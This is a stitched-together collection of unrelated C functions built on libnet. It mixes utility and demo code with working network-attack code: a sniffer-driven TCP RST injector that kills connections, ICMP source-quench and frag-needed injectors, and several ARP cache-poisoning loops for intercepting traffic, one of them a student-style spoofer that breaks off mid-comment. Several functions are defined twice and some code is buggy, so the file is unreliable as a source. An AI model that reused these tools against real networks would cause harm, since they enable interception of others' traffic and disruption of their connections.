static void send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp) { int len; ip->ip_hl = 5; ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H); ip->ip_id = libnet_get_prand(LIBNET_PRu16); memcpy(buf, (u_char *)ip, LIBNET_IPV4_H); tcp->th_off = 5; tcp->th_win = htons(MIN_WIN); memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H); libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H); len = LIBNET_IPV4_H + LIBNET_TCP_H; if (libnet_write_raw_ipv4(l, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), 1); }
static void send_icmp_frag_needed(libnet_t *l, struct libnet_ipv4_hdr *ip) { struct libnet_icmpv4_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H); icmp->icmp_type = ICMP_UNREACH; icmp->icmp_code = ICMP_UNREACH_NEEDFRAG; icmp->hun.frag.pad = 0; icmp->hun.frag.mtu = htons(MIN_MTU); memcpy((u_char *)icmp + LIBNET_ICMPV4_MASK_H, (u_char *)ip, len); len += LIBNET_ICMPV4_MASK_H; libnet_build_ipv4(LIBNET_IPV4_H + len, 4, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, (u_int8_t *) icmp, len, l, 0); if (libnet_write(l) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: ", libnet_addr2name4(ip->ip_dst.s_addr, 0), libnet_addr2name4(ip->ip_src.s_addr, 0)); fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n", libnet_addr2name4(ip->ip_src.s_addr, 0), MIN_MTU); }
static void send_icmp_source_quench(libnet_t *l, struct libnet_ipv4_hdr *ip) { struct libnet_icmpv4_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H); icmp->icmp_type = ICMP_SOURCEQUENCH; icmp->icmp_code = 0; memcpy((u_char *)icmp + LIBNET_ICMPV4_ECHO_H, (u_char *)ip, len); len += LIBNET_ICMPV4_ECHO_H; libnet_build_ipv4(LIBNET_IPV4_H + len, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, (u_int8_t *) icmp, len, l, 0); if (libnet_write(l) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", libnet_addr2name4(ip->ip_dst.s_addr, 0), libnet_addr2name4(ip->ip_src.s_addr, 0)); }
/* * Checks to see if an IP is client or server by finding it in the tree * returns SERVER or CLIENT. * if mode = UNKNOWN, then abort on unknowns * if mode = CLIENT, then unknowns become clients * if mode = SERVER, then unknowns become servers */ int check_ip_tree(const int mode, const unsigned long ip) { struct tree_type *node = NULL, *finder = NULL; finder = new_tree(); finder->ip = ip; node = RB_FIND(data_tree, &treeroot, finder); if (node == NULL && mode == UNKNOWN) errx(1, "%s (%lu) is an unknown system... aborting.!\n" "Try a different auto mode (-n router|client|server)", libnet_addr2name4(ip, RESOLVE), ip); #ifdef DEBUG if (node->type == SERVER) { dbg(1, "Server: %s", libnet_addr2name4(ip, RESOLVE)); } else if (node->type == CLIENT) { dbg(1, "Client: %s", libnet_addr2name4(ip, RESOLVE)); } else { dbg(1, "Unknown: %s", libnet_addr2name4(ip, RESOLVE)); } #endif /* return node type if we found the node, else return the default (mode) */ if (node != NULL) { return (node->type); } else { return mode; } }
static void tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ipv4_hdr *ip; struct libnet_tcp_hdr *tcp; char ctext[64]; u_int32_t seq, win; int i, len; libnet_t *l; l = (libnet_t *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ipv4_hdr *)pkt; if (ip->ip_p != IPPROTO_TCP) return; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) return; seq = ntohl(tcp->th_ack); win = ntohs(tcp->th_win); snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:", libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE), ntohs(tcp->th_dport)); for (i = 0; i < Opt_severity; i++) { seq += (i * win); libnet_clear_packet(l); libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, l, 0); if (libnet_write(l) < 0) warn("write"); fprintf(stderr, "%s R %lu:%lu(0) win 0\n", ctext, (unsigned long) seq, (unsigned long) seq); } ++kill_counter; if (Opt_max_kill && kill_counter >= Opt_max_kill) { pcap_breakloop(pd); } }
static int arp_send(libnet_t *l, int op, u_int8_t *sha, in_addr_t spa, u_int8_t *tha, in_addr_t tpa) { int retval; if (sha == NULL && (sha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) { return (-1); } if (spa == 0) { if ((spa = libnet_get_ipaddr4(l)) == -1) return (-1); } if (tha == NULL) tha = "\xff\xff\xff\xff\xff\xff"; libnet_autobuild_arp(op, sha, (u_int8_t *)&spa, tha, (u_int8_t *)&tpa, l); libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, l, 0); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha)); if (op == ARPOP_REQUEST) { fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(tpa, LIBNET_DONT_RESOLVE), libnet_addr2name4(spa, LIBNET_DONT_RESOLVE)); } else { fprintf(stderr, "%s 0806 42: arp reply %s is-at ", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(spa, LIBNET_DONT_RESOLVE)); fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)sha)); } retval = libnet_write(l); char *libnetError = libnet_geterror(l); if (strlen(libnetError) > 0) { fprintf(stderr, "%s", libnetError); exit(1); } libnet_clear_packet(l); return retval; }
static void nfs_save(struct tuple4 *addr, struct myreadargs *ma, u_char *buf, int len) { int fd; warnx("%s.%d > %s.%d: %s (%d@%d)", libnet_addr2name4(addr->daddr, LIBNET_DONT_RESOLVE), addr->dest, libnet_addr2name4(addr->saddr, LIBNET_DONT_RESOLVE), addr->source, ma->filename, len, ma->offset); if ((fd = open(ma->filename, O_WRONLY|O_CREAT, 0644)) >= 0) { if (lseek(fd, ma->offset, SEEK_SET) == ma->offset) write(fd, buf, len); } close(fd); }
int main() { libnet_t *l; /* libnet context */ char errbuf[LIBNET_ERRBUF_SIZE]; u_int32_t ip_addr; struct libnet_ether_addr *mac_addr; l = libnet_init(LIBNET_RAW4, "eth0", errbuf); if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } ip_addr = libnet_get_ipaddr4(l); if (ip_addr != -1) printf("IP address: %s\n", libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE)); else fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l)); mac_addr = libnet_get_hwaddr(l); if (mac_addr != NULL) printf("MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n", mac_addr->ether_addr_octet[0], mac_addr->ether_addr_octet[1], mac_addr->ether_addr_octet[2], mac_addr->ether_addr_octet[3], mac_addr->ether_addr_octet[4], mac_addr->ether_addr_octet[5]); else fprintf(stderr, "Couldn't get own MAC address: %s\n", libnet_geterror(l)); libnet_destroy(l); return 0; }
void add_tree(const unsigned long ip, const u_char * data) { struct tree_type *node = NULL, *newnode = NULL; newnode = packet2tree(data); if (newnode->type == UNKNOWN) { /* couldn't figure out if packet was client or server */ dbg(2, "%s (%lu) unknown client/server", libnet_addr2name4(newnode->ip, RESOLVE), newnode->ip); } /* try to find a simular entry in the tree */ node = RB_FIND(data_tree, &treeroot, newnode); #ifdef DEBUG if (debug > 2) tree_printnode("add_tree", node); #endif /* new entry required */ if (node == NULL) { /* increment counters */ if (newnode->type == SERVER) { newnode->server_cnt++; } else if (newnode->type == CLIENT) { newnode->client_cnt++; } /* insert it in */ RB_INSERT(data_tree, &treeroot, newnode); } else { /* we found something, so update it */ dbg(2, " node: %p\nnewnode: %p", node, newnode); #ifdef DEBUG if (debug > 2) tree_printnode("update node", node); #endif /* increment counter */ if (newnode->type == SERVER) { node->server_cnt++; } else if (newnode->type == CLIENT) { /* temp debug code */ node->client_cnt++; } /* didn't insert it, so free it */ free(newnode); } dbg(2, "------- START NEXT -------"); #ifdef DEBUG if (debug > 2) tree_print(&treeroot); #endif }
int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char pcap_ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; int c; intf = NULL; spoof_ip = target_ip = 0; while ((c = getopt(argc, argv, "i:t:h?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case 't': if ((target_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) usage(); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 1) usage(); if ((spoof_ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) usage(); if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL) errx(1, "%s", pcap_ebuf); if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); if (target_ip != 0 && !arp_find(target_ip, &target_mac)) errx(1, "couldn't arp for host %s", libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE)); signal(SIGHUP, cleanup); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); for (;;) { arp_send(l, ARPOP_REPLY, NULL, spoof_ip, (target_ip ? (u_int8_t *)&target_mac : NULL), target_ip); sleep(2); } /* NOTREACHED */ exit(0); }
static int arp_send(libnet_t *l, int op, u_int8_t *sha, in_addr_t spa, u_int8_t *tha, in_addr_t tpa, u_int8_t *me) { int retval; if (!me) me = sha; libnet_autobuild_arp(op, sha, (u_int8_t *)&spa, tha, (u_int8_t *)&tpa, l); libnet_build_ethernet(tha, me, ETHERTYPE_ARP, NULL, 0, l, 0); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)me)); if (op == ARPOP_REQUEST) { fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(tpa, LIBNET_DONT_RESOLVE), libnet_addr2name4(spa, LIBNET_DONT_RESOLVE)); } else { fprintf(stderr, "%s 0806 42: arp reply %s is-at ", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(spa, LIBNET_DONT_RESOLVE)); fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)sha)); } retval = libnet_write(l); if (retval) fprintf(stderr, "%s", libnet_geterror(l)); libnet_clear_packet(l); return retval; }
static void tree_printnode(const char *name, const struct tree_type *node) { if (node == NULL) { fprintf(stderr, "%s node is null\n", name); } else { fprintf(stderr, "-- %s: %p\nIP: %s\nMask: %d\nSrvr: %d\nClnt: %d\n", name, (void *)node, libnet_addr2name4(node->ip, RESOLVE), node->masklen, node->server_cnt, node->client_cnt); if (node->type == SERVER) { fprintf(stderr, "Type: Server\n--\n"); } else { fprintf(stderr, "Type: Client\n--\n"); } } }
/* * tree_comp(), called by rbsearch compares two treees and returns: * 1 = first > second * -1 = first < second * 0 = first = second * based upon the ip address stored * */ int tree_comp(struct tree_type *t1, struct tree_type *t2) { if (t1->ip > t2->ip) { dbg(2, "%s > %s", libnet_addr2name4(t1->ip, RESOLVE), libnet_addr2name4(t2->ip, RESOLVE)); return 1; } if (t1->ip < t2->ip) { dbg(2, "%s < %s", libnet_addr2name4(t1->ip, RESOLVE), libnet_addr2name4(t2->ip, RESOLVE)); return -1; } dbg(2, "%s = %s", libnet_addr2name4(t1->ip, RESOLVE), libnet_addr2name4(t2->ip, RESOLVE)); return 0; }
int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char pcap_ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; int c; int n_scan_hosts = 0; char *scan_prefix = NULL; int scan_prefix_length = 32; char *cleanup_src = NULL; in_addr_t target_addr; intf = NULL; poison_reverse = 0; poison_mesh = 0; n_hosts = 0; /* allocate enough memory for target list */ hosts = calloc( argc+1, sizeof(struct host) ); while ((c = getopt(argc, argv, "vrmi:s:t:c:h?V")) != -1) { switch (c) { case 'v': verbose = 1; break; case 'i': intf = optarg; break; case 't': target_addr = libnet_name2addr4(l, optarg, LIBNET_RESOLVE); if (target_addr == -1) { usage(); } else { host_add(target_addr, HOST_TARGET); } break; case 'r': poison_reverse = 1; break; case 'm': poison_mesh = 1; break; case 's': scan_prefix = strchr(optarg, '/'); if (scan_prefix) { *scan_prefix = '\0'; scan_prefix_length = atoi(scan_prefix+1); if (scan_prefix_length < 0 || scan_prefix_length > 32) { usage(); } } n_scan_hosts += (1<<(32-scan_prefix_length)); /* we need some more memory to store the target data */ int mem = (argc+1 + n_scan_hosts) * sizeof(struct host); hosts = realloc( hosts, mem ); hosts[n_hosts].ip = (uint32_t)0; subnet_add(inet_addr(optarg), scan_prefix_length, HOST_TARGET); break; case 'c': cleanup_src = optarg; break; default: usage(); } } argc -= optind; argv += optind; if (!cleanup_src || strcmp(cleanup_src, "own")==0) { /* default! */ /* only use our own hw address when cleaning up, * not jeopardizing any bridges on the way to our * target */ cleanup_src_own = 1; cleanup_src_host = 0; } else if (strcmp(cleanup_src, "host")==0) { /* only use the target hw address when cleaning up; * this can screw up some bridges and scramble access * for our own host, however it resets the arp table * more reliably */ cleanup_src_own = 0; cleanup_src_host = 1; } else if (strcmp(cleanup_src, "both")==0) { cleanup_src_own = 1; cleanup_src_host = 1; } else { errx(1, "Invalid parameter to -c: use 'own' (default), 'host' or 'both'."); usage(); } while (argc--) { if ((target_addr = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) { errx(1, "Invalid address: %s", argv[0]); usage(); } host_add(target_addr, HOST_MODEL); argv++; } if (poison_mesh) { struct host *host = hosts; for(;host->ip; host++) { host->flags |= (HOST_TARGET|HOST_MODEL); } } if (poison_reverse && active_targets() <= 0) { errx(1, "Spoofing the reverse path (-r) is only available when specifying at least one target (-t/-s)."); usage(); } if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL) errx(1, "%s", pcap_ebuf); if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); fprintf(stderr, "Scanning %d hw addresses...\n", n_hosts); struct host *target = hosts; for (; target->ip; target++) { if (verbose) { fprintf(stderr, "Looking up host %s...\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE)); } int arp_status = arp_find(target->ip, &target->mac); if (arp_status && /* just make sure we are not getting an empty or broadcast address */ (memcmp(&target->mac, zero_ha, sizeof(struct ether_addr)) != 0) && (memcmp(&target->mac, brd_ha, sizeof(struct ether_addr)) != 0)) { target->flags |= HOST_ACTIVE; if (target->flags & HOST_SUBNET) { fprintf(stderr, "Found host in subnet %s: %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE), ether_ntoa((struct ether_addr *)&target->mac)); } } else { target->flags &= (~HOST_ACTIVE); if (! (target->flags & HOST_SUBNET)) { fprintf(stderr, "Unable to find specified host %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE)); } if (poison_reverse && target->flags & HOST_MODEL) { errx(1, "couldn't arp for spoof host %s", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE)); usage(); } } } if ((my_ha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) { errx(1, "Unable to determine own mac address"); } if (active_targets() == 0) { errx(1, "No target hosts found."); } signal(SIGHUP, cleanup); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); fprintf(stderr, "Starting spoofing process...\n"); for (;;) { struct host *target = hosts; for(;target->ip; target++) { if (!(target->flags & HOST_TARGET)) continue; if (!(target->flags & HOST_ACTIVE)) continue; struct host *model = hosts; for (;model->ip; model++) { if (!(model->flags & HOST_ACTIVE)) continue; if (!(model->flags & HOST_MODEL)) continue; if (target->ip != model->ip) { arp_send(l, ARPOP_REPLY, my_ha, model->ip, (target->ip ? (u_int8_t *)&target->mac : brd_ha), target->ip, my_ha); usleep(ARP_PAUSE); if (poison_reverse) { arp_send(l, ARPOP_REPLY, my_ha, target->ip, (uint8_t *)&model->mac, model->ip, my_ha); usleep(ARP_PAUSE); } } } } sleep(2); } /* NOTREACHED */ exit(0); }
struct tree_type * packet2tree(const u_char * data) { struct tree_type *node = NULL; eth_hdr_t *eth_hdr = NULL; ip_hdr_t ip_hdr; tcp_hdr_t tcp_hdr; udp_hdr_t udp_hdr; icmp_hdr_t icmp_hdr; dns_hdr_t dns_hdr; node = new_tree(); eth_hdr = (eth_hdr_t *) (data); /* prevent issues with byte alignment, must memcpy */ memcpy(&ip_hdr, (data + LIBNET_ETH_H), LIBNET_IP_H); /* copy over the source mac */ strncpy((char *)node->mac, (char *)eth_hdr->ether_shost, 6); /* copy over the source ip */ node->ip = ip_hdr.ip_src.s_addr; /* * TCP */ if (ip_hdr.ip_p == IPPROTO_TCP) { dbg(1, "%s uses TCP... ", libnet_addr2name4(ip_hdr.ip_src.s_addr, RESOLVE)); /* memcpy it over to prevent alignment issues */ memcpy(&tcp_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4)), LIBNET_TCP_H); /* ftp-data is going to skew our results so we ignore it */ if (tcp_hdr.th_sport == 20) { return (node); } /* set TREE->type based on TCP flags */ if (tcp_hdr.th_flags == TH_SYN) { node->type = CLIENT; dbg(1, "is a client"); } else if (tcp_hdr.th_flags == (TH_SYN | TH_ACK)) { node->type = SERVER; dbg(1, "is a server"); } else { dbg(1, "is an unknown"); } /* * UDP */ } else if (ip_hdr.ip_p == IPPROTO_UDP) { /* memcpy over to prevent alignment issues */ memcpy(&udp_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4)), LIBNET_UDP_H); dbg(1, "%s uses UDP... ", libnet_addr2name4(ip_hdr.ip_src.s_addr, RESOLVE)); switch (ntohs(udp_hdr.uh_dport)) { case 0x0035: /* dns */ /* prevent memory alignment issues */ memcpy(&dns_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4) + LIBNET_UDP_H), LIBNET_DNS_H); if (dns_hdr.flags & DNS_QUERY_FLAG) { /* bit set, response */ node->type = SERVER; dbg(1, "is a dns server"); } else { /* bit not set, query */ node->type = CLIENT; dbg(1, "is a dns client"); } return (node); break; default: break; } switch (ntohs(udp_hdr.uh_sport)) { case 0x0035: /* dns */ /* prevent memory alignment issues */ memcpy(&dns_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4) + LIBNET_UDP_H), LIBNET_DNS_H); if (dns_hdr.flags & DNS_QUERY_FLAG) { /* bit set, response */ node->type = SERVER; dbg(1, "is a dns server"); } else { /* bit not set, query */ node->type = CLIENT; dbg(1, "is a dns client"); } return (node); break; default: dbg(1, "unknown UDP protocol: %hu->%hu", udp_hdr.uh_sport, udp_hdr.uh_dport); break; } /* * ICMP */ } else if (ip_hdr.ip_p == IPPROTO_ICMP) { /* prevent alignment issues */ memcpy(&icmp_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4)), LIBNET_ICMP_H); dbg(1, "%s uses ICMP... ", libnet_addr2name4(ip_hdr.ip_src.s_addr, RESOLVE)); /* * if port unreachable, then source == server, dst == client */ if ((icmp_hdr.icmp_type == ICMP_UNREACH) && (icmp_hdr.icmp_code == ICMP_UNREACH_PORT)) { node->type = SERVER; dbg(1, "is a server with a closed port"); } } return (node); }
int main(int argc, char** argv){ libnet_t *l; //libnet context char errbuf[LIBNET_ERRBUF_SIZE]; char ip_addr_str[16], mac_addr_str[18]; u_int32_t ip_addr; u_int8_t *ip_addr_p, *mac_addr; int i, length; //for libnet_hex_aton if( argc <= 1 ){ fprintf(stderr, "Usage: %s <iface>\n", argv[0]); exit(EXIT_FAILURE); } l = libnet_init(LIBNET_RAW4 /*inj. type*/, argv[1] /* iface */, errbuf); if( l == NULL ){ fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } //IP addr printf("IP addr: "); scanf("%15s", ip_addr_str); ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_RESOLVE); if( ip_addr != -1 ){ //no error //libnet always deals with stuff in network order /* Check your system's endianess: */ ip_addr_p = (u_int8_t*)(&ip_addr); printf("ip_addr: %08X\n", ip_addr); printf("ip_addr_p: %02X %02X %02X %02X\n", ip_addr_p[0],\ ip_addr_p[1], ip_addr_p[2], ip_addr_p[3]); printf("Address as per addr2name4: %s\n", \ libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE)); } else{ fprintf(stderr, "Error converting IP\n"); } // MAC addr printf("MAC address: "); scanf("%17s", mac_addr_str); mac_addr = libnet_hex_aton((int8_t*)mac_addr_str, &length); if( mac_addr != NULL) { printf("Address read: "); for ( i=0; i < length; i++) { printf("%02X", mac_addr[i]); if ( i < length-1 ) printf(":"); } printf("\n"); // Remember to free the memory allocated by libnet_hex_aton() free(mac_addr); } else{ fprintf(stderr, "Error converting MAC address.\n"); } libnet_destroy(l); return 0; }
void drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt) { struct ether_header *eh = NULL; struct ip *ih = NULL; struct tcphdr *th = NULL; char *state = NULL; in_port_t sport = 0; size_t paylen = 0; u_int32_t isn = 0; if (dp->payload != NULL) paylen = strlen(dp->payload); state = TCP_PHASE(dp->flags, "S", "A"); if (pkt != NULL) { eh = (struct ether_header *)pkt; ih = (struct ip *)(pkt + sizeof(struct ether_header)); th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip)); isn = th->th_ack; sport = th->th_dport; } else { sport = libnet_get_prand(LIBNET_PRu16); } /* Sanity check: check the ack number of the packet to * make sure we sent it. We can do this by performing * a calculation on the sequence number we * send, based on a "secret" random number */ if (check_isn(dp, sport, &isn) < 0) { (void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n", state, TCP_PHASE( dp->flags, dp->saddr, libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE) ), sport, TCP_PHASE( dp->flags, dp->daddr, libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE) ), dp->dport, (dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""), isn); if (dp->opts & O_CHKISN) return; } LIBNET_ERR(dp->p_tcp = libnet_build_tcp( TCP_PHASE(dp->flags, sport, th->th_dport), /* Source port */ dp->dport, /* Destination port */ TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)), /* ISN */ /* Sniffed packet's seq num */ TCP_PHASE(dp->flags, 0, (th->th_seq + 1)), /* ACK */ TCP_PHASE(dp->flags, dp->flags, dp->flags /*| TH_PUSH*/), /* Control flags */ dp->winsize, /* window size */ 0, /* auto checksum */ 0, /* Urgent data pointer */ TCP_PHASE(dp->flags, LIBNET_TCP_H, LIBNET_TCP_H + paylen), /* total packet length */ TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload), /* payload */ TCP_PHASE(dp->flags, 0, paylen), /* payload size */ dp->l, /* libnet context */ dp->p_tcp /* ptag */ )); LIBNET_ERR(dp->p_ip = libnet_build_ipv4( TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen), TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY), /* TOS */ libnet_get_prand(LIBNET_PRu16), 0, /* Frag */ MAX_TTL, /* TTL */ IPPROTO_TCP, /* Protocol */ 0, /* auto checksum */ TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset), ih->ip_dst.s_addr), /* XXX error check, source */ TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE), ih->ip_src.s_addr), /* XXX error check, destination */ NULL, /* payload */ 0, /* payload size */ dp->l, /* libnet context */ dp->p_ip /* libnet ptag */ )); if (libnet_write(dp->l) == -1) state = "x"; (void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state, TCP_PHASE( dp->flags, libnet_addr2name4( htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset), LIBNET_DONT_RESOLVE ), libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE) ), sport, TCP_PHASE( dp->flags, dp->daddr, libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE) ), dp->dport); (void)fflush(stdout); }
int main(int argc, char* argv[]) { libnet_t *l; /* libnet context */ char errbuf[LIBNET_ERRBUF_SIZE]; u_int32_t ip_addr; struct libnet_ether_addr *mac_addr; l = libnet_init(LIBNET_RAW4, NULL, errbuf); uint8_t *dst_mac, *ether_frame; int sd, sd2, sd3, frame_length, bytes; uint8_t *ether_frame2; struct sockaddr_ll device; arp_hdr arphdr_send; arp_hdr *arphdr_receive; ether_frame = (uint8_t *)malloc(IP_MAXPACKET * sizeof(uint8_t)); ether_frame2 = (uint8_t *)malloc(IP_MAXPACKET * sizeof(uint8_t)); memset(ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t)); char buff[1024]; char buff2[1024]; int count = 0; pthread_t p_thread[2]; int thr_id, thr_id2; char str[256]; /* get gateway address */ FILE *in = popen("route", "r"); for (int i = 0; i < 3; i++) { fgets(buff, sizeof(buff), in); } while (buff[count] != ' ') count++; while (buff[count] == ' ') count++; inet_aton(buff + count, &gw_ip_addr); printf("\n [+]Gateway IP Adress : %s\n", inet_ntoa(gw_ip_addr)); pclose(in); /* Address HWtype HWaddress Flags Mask Iface 192.168.230.2 ether 00:50:56:f4:44:1d C ens33 */ sprintf(str, "arp %s",inet_ntoa(gw_ip_addr)); FILE *in2 = popen(str, "r"); count=0; fgets(buff2, sizeof(buff2), in); fgets(buff2, sizeof(buff2), in); while (buff2[count] != ' ') count++; while (buff2[count] == ' ') count++; while (buff2[count] != ' ') count++; while (buff2[count] == ' ') count++; gw_mac_addr=ether_aton(buff2 + count); pclose(in2); printf("\n [+]PRINT REQUEST_PACKET\n"); struct in_addr target_ip_addr; inet_aton(argv[1], &target_ip_addr); printf("target IP Adress : %s\n", inet_ntoa(target_ip_addr)); ///////////////////// 0.get my attacker's mac , ip //////////////////////////////// if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } /* get ip address */ ip_addr = libnet_get_ipaddr4(l); if (ip_addr != 0xff) printf("Src IP address: %s\n", libnet_addr2name4(ip_addr, \ LIBNET_DONT_RESOLVE)); else fprintf(stderr, "Couldn't get own IP address: %s\n", \ libnet_geterror(l)); /* get mac address */ mac_addr = libnet_get_hwaddr(l); if (mac_addr != NULL) printf("Src MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n", \ mac_addr->ether_addr_octet[0], \ mac_addr->ether_addr_octet[1], \ mac_addr->ether_addr_octet[2], \ mac_addr->ether_addr_octet[3], \ mac_addr->ether_addr_octet[4], \ mac_addr->ether_addr_octet[5]); else fprintf(stderr, "Couldn't get own MAC address: %s\n", \ libnet_geterror(l)); libnet_destroy(l); // Submit request for a raw socket descriptor. if ((sd2 = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("socket() failed "); exit(EXIT_FAILURE); } // Listen for incoming ethernet frame from socket sd. // We expect an ARP ethernet frame of the form: // MAC (6 bytes) + MAC (6 bytes) + ethernet type (2 bytes) // + ethernet data (ARP header) (28 bytes) // Keep at it until we get an ARP reply. arphdr_receive = (arp_hdr *)(ether_frame2 + LIBNET_ETH_H); /////////////////////// 1. send REQUEST packet //////////////////////////// // ARP header (request) // Hardware type (16 bits): 1 for ethernet // arp_request_hdr.ar_hrd = htons(ARPHRD_ETHER); arphdr_send.htype = htons(ARPHRD_ETHER); // Protocol type (16 bits): 2048 for IP arphdr_send.ptype = htons(ETHERTYPE_IP); // Hardware address length (8 bits): 6 bytes for MAC address arphdr_send.hlen = 6; // Protocol address length (8 bits): 4 bytes for IPv4 address arphdr_send.plen = 4; // OpCode: 1 for ARP request arphdr_send.opcode = htons(ARPOP_REQUEST); // Sender hardware address (48 bits): MAC address memcpy(&arphdr_send.sender_mac, mac_addr, 6 * sizeof(uint8_t)); // Sender protocol address (32 bits) memcpy(&arphdr_send.sender_ip, &ip_addr, 4 * sizeof(uint8_t)); // See getaddrinfo() resolution of src_ip;. // Target hardware address (48 bits): zero, since we don't know it yet. memset(&arphdr_send.target_mac, 0, 6 * sizeof(uint8_t)); // Target protocol address (32 bits) memcpy(&arphdr_send.target_ip, &target_ip_addr, 4 * sizeof(uint8_t)); // Fill out ethernet 